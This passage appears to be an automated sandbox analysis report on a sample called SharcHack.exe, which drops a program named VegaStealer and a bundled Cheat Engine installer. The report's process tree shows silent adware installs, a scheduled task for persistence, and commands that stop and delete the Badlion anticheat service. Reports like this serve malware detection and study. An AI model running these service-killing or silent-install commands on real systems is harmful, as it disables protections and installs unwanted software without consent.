pid Process 1512 v2.exe 1512 v2.exe 1512 v2.exe 1512 v2.exe 2336 3.exe 2336 3.exe 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 852 powershell.exe 852 powershell.exe 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 4676 CheatEngine75.tmp 2336 3.exe 2336 3.exe 2336 3.exe 2336 3.exe 2336 3.exe 2336 3.exe 400 powershell.exe 400 powershell.exe 2336 3.exe 2336 3.exe 1384 powershell.exe 1384 powershell.exe 2232 updater.exe 2232 updater.exe 2640 powershell.exe 2640 powershell.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 468 powershell.exe 468 powershell.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 2232 updater.exe 1992 conhost.exe 1992 conhost.exe 2232 updater.exe 2232 updater.exe 4900 conhost.exe 4900 conhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1512 v2.exe Token: SeDebugPrivilege 852 powershell.exe Token: SeShutdownPrivilege 4444 powercfg.exe Token: SeCreatePagefilePrivilege 4444 powercfg.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeShutdownPrivilege 3132 powercfg.exe Token: SeCreatePagefilePrivilege 3132 powercfg.exe Token: SeShutdownPrivilege 4424 powercfg.exe Token: SeCreatePagefilePrivilege 4424 powercfg.exe Token: SeShutdownPrivilege 4832 powercfg.exe Token: SeCreatePagefilePrivilege 4832 powercfg.exe Token: SeIncreaseQuotaPrivilege 400 powershell.exe Token: SeSecurityPrivilege 400 powershell.exe Token: SeTakeOwnershipPrivilege 400 powershell.exe Token: SeLoadDriverPrivilege 400 powershell.exe Token: SeSystemProfilePrivilege 400 powershell.exe Token: SeSystemtimePrivilege 400 powershell.exe Token: SeProfSingleProcessPrivilege 400 powershell.exe Token: SeIncBasePriorityPrivilege 400 powershell.exe Token: SeCreatePagefilePrivilege 400 powershell.exe Token: SeBackupPrivilege 400 powershell.exe Token: SeRestorePrivilege 400 powershell.exe Token: SeShutdownPrivilege 400 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeSystemEnvironmentPrivilege 400 powershell.exe Token: SeRemoteShutdownPrivilege 400 powershell.exe Token: SeUndockPrivilege 400 powershell.exe Token: SeManageVolumePrivilege 400 powershell.exe Token: 33 400 powershell.exe Token: 34 400 powershell.exe Token: 35 400 powershell.exe Token: 36 400 powershell.exe Token: SeIncreaseQuotaPrivilege 400 powershell.exe Token: SeSecurityPrivilege 400 powershell.exe Token: SeTakeOwnershipPrivilege 400 powershell.exe Token: SeLoadDriverPrivilege 400 powershell.exe Token: SeSystemProfilePrivilege 400 powershell.exe Token: SeSystemtimePrivilege 400 powershell.exe Token: SeProfSingleProcessPrivilege 400 powershell.exe Token: SeIncBasePriorityPrivilege 400 powershell.exe Token: SeCreatePagefilePrivilege 400 powershell.exe Token: SeBackupPrivilege 400 powershell.exe Token: SeRestorePrivilege 400 powershell.exe Token: SeShutdownPrivilege 400 powershell.exe Token: SeDebugPrivilege 400 powershell.exe Token: SeSystemEnvironmentPrivilege 400 powershell.exe Token: SeRemoteShutdownPrivilege 400 powershell.exe Token: SeUndockPrivilege 400 powershell.exe Token: SeManageVolumePrivilege 400 powershell.exe Token: 33 400 powershell.exe Token: 34 400 powershell.exe Token: 35 400 powershell.exe Token: 36 400 powershell.exe Token: SeIncreaseQuotaPrivilege 400 powershell.exe Token: SeSecurityPrivilege 400 powershell.exe Token: SeTakeOwnershipPrivilege 400 powershell.exe Token: SeLoadDriverPrivilege 400 powershell.exe Token: SeSystemProfilePrivilege 400 powershell.exe Token: SeSystemtimePrivilege 400 powershell.exe Token: SeProfSingleProcessPrivilege 400 powershell.exe Token: SeIncBasePriorityPrivilege 400 powershell.exe Token: SeCreatePagefilePrivilege 400 powershell.exe Token: SeBackupPrivilege 400 powershell.exe Token: SeRestorePrivilege 400 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 4676 CheatEngine75.tmp 4760 CheatEngine75.tmp 1416 Razer Axon_240662296.tmp -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4976 irsetup.exe 4976 irsetup.exe 4976 irsetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3528 wrote to memory of 2336 3528 SharcHack.exe 85 PID 3528 wrote to memory of 2336 3528 SharcHack.exe 85 PID 3528 wrote to memory of 1764 3528 SharcHack.exe 86 PID 3528 wrote to memory of 1764 3528 SharcHack.exe 86 PID 3528 wrote to memory of 1764 3528 SharcHack.exe 86 PID 3528 wrote to memory of 2208 3528 SharcHack.exe 87 PID 3528 wrote to memory of 2208 3528 SharcHack.exe 87 PID 3528 wrote to memory of 2208 3528 SharcHack.exe 87 PID 1764 wrote to memory of 1512 1764 VegaStealer_v2.exe 88 PID 1764 wrote to memory of 1512 1764 VegaStealer_v2.exe 88 PID 1764 wrote to memory of 1512 1764 VegaStealer_v2.exe 88 PID 2208 wrote to memory of 4676 2208 CheatEngine75.exe 89 PID 2208 wrote to memory of 4676 2208 CheatEngine75.exe 89 PID 2208 wrote to memory of 4676 2208 CheatEngine75.exe 89 PID 4428 wrote to memory of 1840 4428 cmd.exe 101 PID 4428 wrote to memory of 1840 4428 cmd.exe 101 PID 3196 wrote to memory of 4444 3196 cmd.exe 102 PID 3196 wrote to memory of 4444 3196 cmd.exe 102 PID 4428 wrote to memory of 3816 4428 cmd.exe 103 PID 4428 wrote to memory of 3816 4428 cmd.exe 103 PID 3196 wrote to memory of 3132 3196 cmd.exe 104 PID 3196 wrote to memory of 3132 3196 cmd.exe 104 PID 4428 wrote to memory of 4352 4428 cmd.exe 105 PID 4428 wrote to memory of 4352 4428 cmd.exe 105 PID 4428 wrote to memory of 2300 4428 cmd.exe 106 PID 4428 wrote to memory of 2300 4428 cmd.exe 106 PID 3196 wrote to memory of 4424 3196 cmd.exe 107 PID 3196 wrote to memory of 4424 3196 cmd.exe 107 PID 3196 wrote to memory of 4832 3196 cmd.exe 108 PID 3196 wrote to memory of 4832 3196 cmd.exe 108 PID 4428 wrote to memory of 2676 4428 cmd.exe 109 PID 4428 wrote to memory of 2676 4428 cmd.exe 109 PID 4428 wrote to memory of 3528 4428 cmd.exe 110 PID 4428 wrote to memory of 3528 4428 cmd.exe 110 PID 4428 wrote to memory of 1468 4428 cmd.exe 111 PID 4428 wrote to memory of 1468 4428 cmd.exe 111 PID 4428 wrote to memory of 3408 4428 cmd.exe 112 PID 4428 wrote to memory of 3408 4428 cmd.exe 112 PID 4428 wrote to memory of 1072 4428 cmd.exe 113 PID 4428 wrote to memory of 1072 4428 cmd.exe 113 PID 4428 wrote to memory of 3644 4428 cmd.exe 114 PID 4428 wrote to memory of 3644 4428 cmd.exe 114 PID 1384 wrote to memory of 4564 1384 powershell.exe 118 PID 1384 wrote to memory of 4564 1384 powershell.exe 118 PID 4648 wrote to memory of 1864 4648 cmd.exe 126 PID 4648 wrote to memory of 1864 4648 cmd.exe 126 PID 2280 wrote to memory of 3876 2280 cmd.exe 127 PID 2280 wrote to memory of 3876 2280 cmd.exe 127 PID 2280 wrote to memory of 2272 2280 cmd.exe 128 PID 2280 wrote to memory of 2272 2280 cmd.exe 128 PID 2280 wrote to memory of 3164 2280 cmd.exe 129 PID 2280 wrote to memory of 3164 2280 cmd.exe 129 PID 2280 wrote to memory of 2120 2280 cmd.exe 130 PID 2280 wrote to memory of 2120 2280 cmd.exe 130 PID 4648 wrote to memory of 5032 4648 cmd.exe 131 PID 4648 wrote to memory of 5032 4648 cmd.exe 131 PID 2280 wrote to memory of 4628 2280 cmd.exe 132 PID 2280 wrote to memory of 4628 2280 cmd.exe 132 PID 2280 wrote to memory of 4876 2280 cmd.exe 134 PID 2280 wrote to memory of 4876 2280 cmd.exe 134 PID 4648 wrote to memory of 1612 4648 cmd.exe 135 PID 4648 wrote to memory of 1612 4648 cmd.exe 135 PID 2280 wrote to memory of 624 2280 cmd.exe 136 PID 2280 wrote to memory of 624 2280 cmd.exe 136 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3416
-
C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"C:\Users\Admin\AppData\Local\Temp\SharcHack.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Users\Admin\AppData\Local\Temp\3.exe"C:\Users\Admin\AppData\Local\Temp\3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2336
-
-
C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"C:\Users\Admin\AppData\Local\Temp\VegaStealer_v2.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1764 -
C:\Users\Admin\AppData\Local\Temp\v2.exe"C:\Users\Admin\AppData\Local\Temp\v2.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Local\Temp\is-FH3EJ.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-FH3EJ.tmp\CheatEngine75.tmp" /SL5="$C021E,29079073,832512,C:\Users\Admin\AppData\Local\Temp\CheatEngine75.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks for any installed AV software in registry
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\saBSI.exe"C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:3760 -
C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\installer.exe"C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod0_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade6⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1452 -
C:\Program Files\McAfee\Temp1332852585\installer.exe"C:\Program Files\McAfee\Temp1332852585\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:4204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1_extract\OperaSetup.exe"C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod1_extract\OperaSetup.exe" --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --silent --allusers=0 --otd=utm.medium:apb,utm.source:ais,utm.campaign:opera_new_a --server-tracking-blob=NDg5MmM0M2NiZmYxOTc2MjY3ZDE3MGIyMzA3NGYyODVjNDZhOGNmNjg5YTA1ZDg5NTRhNThiN2MxZWIzZDk4OTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInRpbWVzdGFtcCI6IjE3MzUwMzgwMTIuNzc0NSIsInVzZXJhZ2VudCI6InB5dGhvbi1yZXF1ZXN0cy8yLjMyLjMiLCJ1dG0iOnt9LCJ1dWlkIjoiYWFmNjZmNDQtNWMyYy00ZmJmLTg0YmQtN2Y2OTE0MGY0MGRiIn0=6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:4908 -
C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x732f9d44,0x732f9d50,0x732f9d5c7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4904
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --showunbox=0 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4908 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241228211302" --session-guid=8946a4c6-2fbf-4910-93d6-478a8d5ed418 --server-tracking-blob="NGEwNTZiMGVmZmM1MmRlYjUzNmQyNjkwMGU1OTc5ODUyN2U4ZjAwYTBlNDQ0NTQ4ZTA2NDk3ODQ2MmNmNjI5NTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczNTAzODAxMi43NzQ1IiwidXNlcmFnZW50IjoicHl0aG9uLXJlcXVlc3RzLzIuMzIuMyIsInV0bSI6eyJjYW1wYWlnbiI6Im9wZXJhX25ld19hIiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoiYWlzIn0sInV1aWQiOiJhYWY2NmY0NC01YzJjLTRmYmYtODRiZC03ZjY5MTQwZjQwZGIifQ== " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C040000000000007⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exeC:\Users\Admin\AppData\Local\Temp\7zSC1E44C28\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.119 --initial-client-data=0x328,0x32c,0x330,0x2f8,0x334,0x6cf19d44,0x6cf19d50,0x6cf19d5c8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:60
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe" --version7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5644 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412282113021\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0xc717a0,0xc717ac,0xc717b88⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3512
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2_extract\RazerLightInstaller.exe"C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\prod2_extract\RazerLightInstaller.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1852 -
C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe"C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /SP- /VERYSILENT /SUPRESSMSGBOXES /NORESTART /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3672 -
C:\Users\Admin\AppData\Local\Temp\is-5OS5A.tmp\Razer Axon_240662296.tmp"C:\Users\Admin\AppData\Local\Temp\is-5OS5A.tmp\Razer Axon_240662296.tmp" /SL5="$501CC,203935122,1023488,C:\Users\Admin\AppData\Local\Temp\Razer Axon_240662296.exe" /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /SP- /VERYSILENT /SUPRESSMSGBOXES /NORESTART /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP7⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:1416 -
C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe"C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe" /S8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe"C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" /S __IRAOFF:2015578 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\is-UPPO1.tmp\RazerCentral_v7.16.0.695.exe" "__IRCT:1" "__IRTSS:124411562" "__IRSID:S-1-5-21-493223053-2004649691-1575712786-1000"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4976
-
-
-
C:\Program Files (x86)\Razer\Razer Axon\Manifest\AxonManifestRepair.exe"C:\Program Files (x86)\Razer\Razer Axon\Manifest\AxonManifestRepair.exe" /silent /axon-ver=1.7.13.999 /axon-dir="C:\Program Files (x86)\Razer\Razer Axon" /manifest-dir=.\8⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Program Files (x86)\Razer\Razer Axon\win32\RazerComponentsController.exe"C:\Program Files (x86)\Razer\Razer Axon\win32\RazerComponentsController.exe" install natasha8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3340
-
-
C:\Program Files (x86)\Razer\Razer Axon\RazerAxonISReporter.exe"C:\Program Files (x86)\Razer\Razer Axon\RazerAxonISReporter.exe" /silent /axon-ver=1.7.13.999 /psh=GnjVZJc9KIVJmEYM74jUcnYXF3VaUcaTJFkDtr1dHVieaXi17EPkxDnIS9zVhhi6bk0h8DHC2cokdVbJcjP /conv-type=install8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5500
-
-
C:\Windows\system32\SchTasks.exe"SchTasks.exe" /Create /tn "AxonLaunchTask" /tr "\"C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe\" -istask" /sc minute /mo 3 /DU 00:05 /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:3932
-
-
C:\Program Files (x86)\Razer\Razer Axon\MicrosoftEdgeWebview2Setup.exe"C:\Program Files (x86)\Razer\Razer Axon\MicrosoftEdgeWebview2Setup.exe" /silent /install8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2912 -
C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\Temp\EU4210.tmp\MicrosoftEdgeUpdate.exe" /silent /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"9⤵
- Event Triggered Execution: Image File Execution Options Injection
- Checks computer location settings
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
PID:5256 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:2188
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:264 -
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"11⤵
- Executes dropped EXE
- Modifies registry class
PID:5452
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"11⤵
- Executes dropped EXE
- Modifies registry class
PID:3056
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.167.21\MicrosoftEdgeUpdateComRegisterShell64.exe"11⤵
- Executes dropped EXE
- Modifies registry class
PID:2828
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xNjcuMjEiIHNoZWxsX3ZlcnNpb249IjEuMy4xNjcuMjEiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0FENTkzMjAtQTQxQi00QTc5LTlDNkUtRTlDMjZBNTVGNEE5fSIgdXNlcmlkPSJ7MUNFQkUxQTYtRkRCRC00RDIwLUJCNDktMDE3MDdEN0M4ODgxfSIgaW5zdGFsbHNvdXJjZT0ib3RoZXJpbnN0YWxsY21kIiByZXF1ZXN0aWQ9InszRTYyRkFCNi04NjJDLTQxNjAtOUQ4My05MTMwNUJGQ0I0RTF9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iOCIgcGh5c21lbW9yeT0iOCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTY3LjIxIiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1ODcxODAzMjI3IiBpbnN0YWxsX3RpbWVfbXM9IjU5MyIvPjwvYXBwPjwvcmVxdWVzdD410⤵
- Executes dropped EXE
- Checks system information in the registry
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5172
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource otherinstallcmd /sessionid "{CAD59320-A41B-4A79-9C6E-E9C26A55F4A9}" /silent10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2472
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe"C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\is-PKDAV.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-PKDAV.tmp\CheatEngine75.tmp" /SL5="$30264,26511452,832512,C:\Users\Admin\AppData\Local\Temp\is-R9HKJ.tmp\CheatEngine75.exe" /VERYSILENT /ZBDIST6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:4760 -
C:\Windows\SYSTEM32\net.exe"net" stop BadlionAntic7⤵PID:2552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAntic8⤵PID:2820
-
-
-
C:\Windows\SYSTEM32\net.exe"net" stop BadlionAnticheat7⤵PID:3052
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BadlionAnticheat8⤵PID:3100
-
-
-
C:\Windows\SYSTEM32\sc.exe"sc" delete BadlionAntic7⤵
- Launches sc.exe
